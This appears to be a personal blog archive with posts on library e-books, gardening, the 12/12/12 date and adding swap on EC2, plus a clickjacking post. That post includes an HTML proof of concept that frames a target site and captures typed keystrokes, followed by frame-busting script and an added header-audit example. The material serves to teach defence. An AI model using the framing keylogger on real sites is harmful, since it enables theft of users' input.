DRM is good for something

Many people are frustrated with Digital Rights Management preventing them from doing to music and e-books what they are used to doing with computer files – backups, convenience of having your media on all of your devices, and for some, piracy.  Of course, it’s the third that drives the need for DRM in the first place.

Recently I’ve been exposed to a use of DRM that I find very, very good. I’ve been using my iPad to access my library’s Overdrive section – essentially eBooks from the library. From the convenience of my couch at home or while away on vacation, I can browse online the books available, check them out, and download them to my iPad (or my kids’ Kindle, etc.) immediately. At the end of the two week lending period, if I’ve not already deleted it/turned it back in, it automatically deletes for me. No more having to remember to do so.

This is GREAT!   Depending on the availability of the material, I may never have to buy a book again.   I’m finding that most of the county library websites I’ve visited have Overdrive collections as well.  My Fort Bend County account does not give access to a whole lot, but I also have a Harris County library card, and they have a lot more selection.   I checked out the Houston Public Library site this morning, and it has a fairly extensive collection as well, so I am going to try to go today and get a library card.    I can see that “collecting library accounts” could soon be a fun pastime.   🙂   The Houston Public Library offers accounts to any Texas resident… perhaps Austin, San Antonio, and Dallas have similar offerings.   Time to take advantage of tax dollars being spent!

Lettuce Trees, Baby Broccoli, and Rainbow Peppers

Here’s what GB1 looked like on the last warm day of the year (Dec 9th) – lettuce and kale look like trees, sure enough!

Lettuce Trees

Finally today I saw evidence of Broccoli crowns!

Baby Broccoli

Back in the conventional garden, I spotted a serrano in red, orange and green all at once. Usually it’s green to black to red – perhaps the odd cold then warm weather played a part…

Rainbow Pepper

Clickjacking

Clickjacking is a vulnerability where pages with sensitive functionality are placed in an invisible IFRAME that overlays seemingly innocuous content. By enticing the user to click various buttons in the innocuous content, the attacker can get victims to click buttons that perform sensitive functionality. Because the victim is actually interacting with the application through the hidden frame, the victim’s cookies containing the session identifier are being sent with each request. If they are already authenticated, any authenticated functionality would be accessible.

Steps to reproduce:
1. Open the HTML file below in an IE browser, changing the IFRAME target to some webpage with form input.

<html>
<head>
<title>Clickjacking</title>
<script>
var keylog='Entered text: ';
function keypress() {
keylog = keylog + String.fromCharCode(window.event.keyCode);
window.status=keylog;
}
</script>
</head>
<body style="margin: 0; padding: 0"
onKeyPress="keypress()"
onLoad="this.focus()"
onBlur="this.focus()">
<div style="padding: 10px; border-bottom: 1px solid red; color: red;">
(see typed words in your status bar)
</div>
<iframe src="https://www.somesite.com/"
width="100%" height="90%" padding="0"
margin="0" frameborder="0" security="Restricted">
</iframe>
</body>
</html>

2. Enter text in any input field and observe that the page is hosted in an IFRAME that echoes back the entered text.   Creepy!

Pages that include form input need to prevent other pages from loading them in iframes and stealing keypresses. The following JavaScript can be used to “break out” of any frames and ensure that the site is loaded in the top window and not in any frame controlled by the attacker.

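// Any one of these checks redirects the top window to this page when it is framed.
if (top != self) top.location.href = self.document.location;
if (parent != self) top.location.href = location.href;
// Note: this one also fires on an unframed page that contains frames of its own.
if (top.frames.length != 0) top.location = self.document.location;
if (window != window.top) top.location.href = location.href;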
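
The frame-busting script only helps if the framed page's script runs, and the test page above loads its target with security="Restricted", which makes IE apply Restricted Sites zone settings (scripting off) to the frame; the X-Frame-Options and Content-Security-Policy frame-ancestors response headers are enforced by the browser regardless. The following is an added example, not code from the original post: a JavaScript (Node.js) check that classifies who may frame a response from its headers, plus the header pair a form page can send. The function names and sample header values are constructed for illustration.

```javascript
// Added example: audit response headers for anti-framing controls.
// Header names are real; function names and sample inputs are constructed.

// Return the frame-ancestors source list from a CSP value, or null if absent.
function frameAncestors(csp) {
  if (!csp) return null;
  for (const directive of csp.split(';')) {
    const [name, ...sources] = directive.trim().split(/\s+/);
    if (name.toLowerCase() === 'frame-ancestors') return sources;
  }
  return null;
}

// Classify who may frame a response: 'none', 'same-origin', 'restricted' or 'anyone'.
function framingPolicy(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);

  // Browsers that support frame-ancestors enforce it instead of X-Frame-Options.
  const fa = frameAncestors(h['content-security-policy']);
  if (fa !== null) {
    // An empty source list matches nothing, the same as 'none'.
    if (fa.length === 0 || (fa.length === 1 && fa[0] === "'none'")) return 'none';
    if (fa.includes('*')) return 'anyone';
    if (fa.length === 1 && fa[0] === "'self'") return 'same-origin';
    return 'restricted';
  }

  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return 'none';
  if (xfo === 'SAMEORIGIN') return 'same-origin';
  // ALLOW-FROM is obsolete and ignored by current browsers: treat as unprotected.
  return 'anyone';
}

// Headers a form page can send so it is never rendered inside another site's frame.
function antiFramingHeaders() {
  return {
    'X-Frame-Options': 'DENY',
    'Content-Security-Policy': "frame-ancestors 'none'",
  };
}
```

A result of 'anyone' for a page with form input means the page relies on script alone to avoid being framed.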

Happy 12/12/12, Everybody!

I’m also going to post this at 12:12:12.  Geeky!  🙂

In other news, according to the Mayan Calendar, there are only 9 more days until the end of the world! What are you going to do with it?

Actually, I already know that’s not going to happen. You know why? Because weather.com says that the high and low for 12/21 are 68 and 51 deg F in Sugar Land, and they are always right.  Those can’t be doomsday temperatures, can they?   🙂

The whole thing is really more of flipping a cycle in the Mayan calendar, sort of like going from 9,999 to 10,000. I think. Read the links above. I don’t have time, I’ve got too much to do in the next 9 days.

Add Swap File to Amazon EC2 Instance

I’m playing around with a free-for-a-year micro instance of Amazon’s Elastic Compute Cloud (EC2), and I noticed that while there was around 600 MB of memory, there was no swap set up! That can grind things to a halt pretty fast. So I set one up:


[root@tauceti ~]# free
total used free shared buffers cached
Mem: 605060 596996 8064 0 68568 440104
-/+ buffers/cache: 88324 516736
Swap: 0 0 0

[root@tauceti ~]# df -k
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/xvde1 6190664 1344280 4531916 23% /
tmpfs 302528 0 302528 0% /dev/shm

[root@tauceti ~]# dd if=/dev/zero of=/swapfile1 bs=1024 count=524288
524288+0 records in
524288+0 records out
536870912 bytes (537 MB) copied, 14.8886 s, 36.1 MB/s

[root@tauceti ~]# df -k
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/xvde1 6190664 1870116 4006080 32% /
tmpfs 302528 0 302528 0% /dev/shm

[root@tauceti ~]# mkswap /swapfile1
Setting up swapspace version 1, size = 524284 KiB
no label, UUID=767b5917-4ff4-453e-bb3a-db644a7a7824

[root@tauceti ~]# chown root:root /swapfile1
[root@tauceti ~]# chmod 0600 /swapfile1
[root@tauceti ~]# swapon /swapfile1
[root@tauceti ~]# echo '/swapfile1 swap swap defaults 0 0' >> /etc/fstab

[root@tauceti ~]# free
total used free shared buffers cached
Mem: 605060 597368 7692 0 68576 440104
-/+ buffers/cache: 88688 516372
Swap: 524280 0 524280